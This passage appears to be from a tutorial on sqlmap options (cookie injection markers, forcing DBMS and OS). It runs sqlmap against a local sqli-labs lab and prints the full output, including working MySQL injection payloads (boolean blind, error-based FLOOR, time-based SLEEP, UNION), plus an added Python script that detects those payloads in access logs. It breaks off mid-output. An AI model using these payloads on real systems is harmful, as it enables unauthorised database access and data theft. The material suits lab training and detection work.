python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/?id=1 --cookie="uname=admin*" --banner

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:37:34 /2020-02-29/

custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]

[20:37:36] [INFO] testing connection to the target URL
[20:37:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:37:36] [INFO] testing if the target URL content is stable
[20:37:36] [INFO] target URL content is stable
[20:37:36] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n]

[20:37:37] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be dynamic
[20:37:37] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might be injectable (possible DBMS: 'MySQL')
[20:37:37] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Cookie #1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:37:37] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:37:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:37:39] [WARNING] reflective value(s) found and filtering out
[20:37:39] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Login")
[20:37:39] [INFO] testing 'Generic inline queries'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:37:40] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable

[20:37:40] [INFO] testing 'MySQL inline queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:37:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:37:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:37:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:37:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:37:50] [INFO] target URL appears to have 3 columns in query
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[20:38:00] [INFO] testing if GET parameter 'id' is dynamic
[20:38:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:38:01] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:38:01] [INFO] testing for SQL injection on GET parameter 'id'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:38:01] [INFO] testing 'Generic inline queries'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:38:05] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:38:06] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:08] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:16] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:38:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:38:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:38:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:38:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:38:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:38:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:27] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:30] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:32] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[20:38:36] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:38:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:38:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:38:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:38:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[20:38:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:38:50] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[20:38:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:38:53] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[20:38:54] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:38:55] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[20:38:56] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:38:57] [INFO] testing 'MySQL OR time-based blind (ELT)'
[20:38:58] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:01] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[20:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:39:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:39:23] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:39:32] [WARNING] GET parameter 'id' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3431 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 3447=3447 AND 'KGyg'='KGyg

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=admin' AND (SELECT 3589 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(3589=3589,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xcai'='xcai

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 2216 FROM (SELECT(SLEEP(5)))rUMt) AND 'oohs'='oohs

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: uname=-9826' UNION ALL SELECT CONCAT(0x717a6b6a71,0x5251674f4156424d73766576455768497757664846575255634647565852644255516a63674d4256,0x7171787071),NULL,NULL-- -
---
[20:39:32] [INFO] the back-end DBMS is MySQL
[20:39:32] [INFO] fetching banner
[20:39:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:39:32] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 20:39:32 /2020-02-29/


The * marker can also be used in options such as --user-agent and --proxy.
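The four technique families in the injection-point summaries above (boolean-based blind, error-based FLOOR, time-based SLEEP, UNION) are also what shows up in a web server's access log. The script below is an added example, not part of this tutorial and not sqlmap code: it scans constructed log lines for those payload shapes, including the cookie-borne Less-20 case, and assumes a site-specific log format with the Cookie header appended as an extra quoted field.

```python
"""Spot the sqlmap payload families reported in the runs above in access logs.

Added example: not part of the original tutorial and not sqlmap's own code.
Assumption: the log is the Apache/Nginx "combined" format with the request
Cookie header appended as one extra quoted field (a site-specific LogFormat),
because a cookie-borne injection like the Less-20 run never shows up in the
request line. All log lines below are constructed.
"""
import re
from urllib.parse import unquote_plus

# One pattern per technique family named in sqlmap's injection-point summary.
SIGNATURES = {
    # id=1' AND 7504=7504 AND 'BNEG'='BNEG  (AND n=n with an identical pair)
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    # ...CONCAT(0x..,(SELECT (ELT(n=n,1))),0x..,FLOOR(RAND(0)*2))x FROM
    #    INFORMATION_SCHEMA.PLUGINS GROUP BY x  (duplicate-key error trick)
    "error-based (FLOOR)": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?\bGROUP\s+BY\b",
        re.I | re.S),
    # id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND ...
    "time-based blind (SLEEP)": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    # id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x..,0x..,0x..)-- -
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# "combined" log format plus the optional trailing cookie field (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)


def classify(text):
    """Technique families present in an already percent-decoded string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_line(line):
    """Return (client_ip, findings) for one log line, or None if unparseable.

    Target and cookie are percent-decoded before matching (sqlmap encodes the
    quote and spaces in the URL, and by default in cookies too, as the Less-20
    run asked). The default sqlmap User-Agent is a finding of its own: it is
    the only signal left when the cookie is not logged at all.
    """
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    for field in ("target", "cookie"):
        raw = m.group(field)
        if raw and raw != "-":
            techniques = classify(unquote_plus(raw))
            if techniques:
                findings.append((field, techniques))
    if m.group("ua").startswith("sqlmap/"):
        findings.append(("ua", ["sqlmap default User-Agent"]))
    return m.group("ip"), findings


def scan_log(lines):
    """Group all non-empty findings by client IP."""
    per_ip = {}
    for line in lines:
        parsed = scan_line(line)
        if parsed and parsed[1]:
            per_ip.setdefault(parsed[0], []).extend(parsed[1])
    return per_ip


UA_SQLMAP = "sqlmap/1.4.2.31#dev (http://sqlmap.org)"
UA_BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
TS = "[29/Feb/2020:20:33:28 +0300]"

# Constructed log lines: one browser visit and four sqlmap probes mirroring
# the payloads in the injection-point summaries above (hex strings shortened).
SAMPLE_LOG = [
    f'10.0.0.5 - - {TS} "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 713 "-" '
    f'"{UA_BROWSER}" "-"',
    f'10.0.0.9 - - {TS} "GET /sqli-labs/Less-1/?id=1%27%20AND%207504%3D7504'
    f'%20AND%20%27BNEG%27%3D%27BNEG HTTP/1.1" 200 713 "-" "{UA_SQLMAP}" "-"',
    f'10.0.0.9 - - {TS} "GET /sqli-labs/Less-1/?id=1%27%20AND%20%28SELECT%208767'
    '%20FROM%20%28SELECT%28SLEEP%285%29%29%29trYN%29%20AND%20%27UXYA%27%3D%27UXYA'
    f' HTTP/1.1" 200 713 "-" "{UA_SQLMAP}" "-"',
    f'10.0.0.9 - - {TS} "GET /sqli-labs/Less-1/?id=-8306%27%20UNION%20ALL%20SELECT'
    '%20NULL%2CNULL%2CCONCAT%280x7176707671%2C0x58757274%2C0x7171627871%29--%20-'
    f' HTTP/1.1" 200 760 "-" "{UA_SQLMAP}" "-"',
    # Less-20: the payload travels in the Cookie header; the request line is clean
    f'10.0.0.9 - - {TS} "GET /sqli-labs/Less-20/ HTTP/1.1" 200 1100 "-" '
    f'"{UA_SQLMAP}" "uname=admin\' AND (SELECT 3589 FROM(SELECT COUNT(*),'
    "CONCAT(0x717a6b6a71,(SELECT (ELT(3589=3589,1))),0x7171787071,"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) "
    "AND 'xcai'='xcai\"",
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, hits)
```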

IV. sqlmap injection options

1. Forcing the DBMS in sqlmap

By default, sqlmap automatically identifies the back-end database management system (DBMS) of the target web application. The DBMS types sqlmap supports are:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server
  • Microsoft Access
  • Firebird
  • SQLite
  • Sybase
  • SAP MaxDB
  • DB2

You can specify the database to detect with an option:
Option:
--dbms database type
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --banner

Output:

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:40:41 /2020-03-01/

[09:40:42] [INFO] testing connection to the target URL
[09:40:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:40:42] [INFO] testing if the target URL content is stable
[09:40:42] [INFO] target URL content is stable
[09:40:42] [INFO] testing if GET parameter 'id' is dynamic
[09:40:42] [INFO] GET parameter 'id' appears to be dynamic
[09:40:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:40:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:40:42] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[09:40:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:40:51] [WARNING] reflective value(s) found and filtering out
[09:40:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:40:51] [INFO] testing 'Generic inline queries'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:40:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:40:52] [INFO] testing 'MySQL inline queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:40:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:41:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:41:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:41:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:41:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:41:02] [INFO] target URL appears to have 3 columns in query
[09:41:02] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---
[09:41:21] [INFO] the back-end DBMS is MySQL
[09:41:21] [INFO] fetching banner
[09:41:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:41:21] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 09:41:21 /2020-03-01/


2. Forcing the OS in sqlmap

By default, sqlmap automatically identifies the back-end operating system of the target web application. The OS types sqlmap fully supports are Linux and Windows.
The operating system to detect can be specified with an option:
Option:
--os system type
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --os windows --banner

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                                 
|___|_  [)]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program               
                                                                                                                                                          
[*] starting @ 09:42:55 /2020-03-01/                                                                                                                      
                                                                                                                                                          
[09:42:56] [INFO] testing connection to the target URL                                                                                                    
sqlmap resumed the following injection point(s) from stored session:                                                                                      
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                               
    Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG                                                                                                         
                                                                                                                                                          
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc                                                                                                             
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA                                                                         
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: Generic UNION query (NULL) - 3 columns                                                                                                         
    Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---                                                                                                                                                       
[09:42:56] [INFO] testing MySQL                                                                                                                           
[09:42:56] [INFO] confirming MySQL                                                                                                                        
[09:42:56] [INFO] the back-end DBMS is MySQL                                                                                                              
[09:42:56] [INFO] fetching banner                                                                                                                         
[09:42:56] [INFO] the back-end DBMS operating system is Windows                                                                                           
back-end DBMS operating system: Windows                                                                                                                   
back-end DBMS: MySQL >= 5.0.0                                                                                                                             
banner: '5.7.26'                                                                                                                                          
[09:42:56] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 09:42:56 /2020-03-01/                                                                                                                        
                                                                                                                                                          
                                                                                                                                                                                                            

Test once more:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os linux --banner

Output:

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
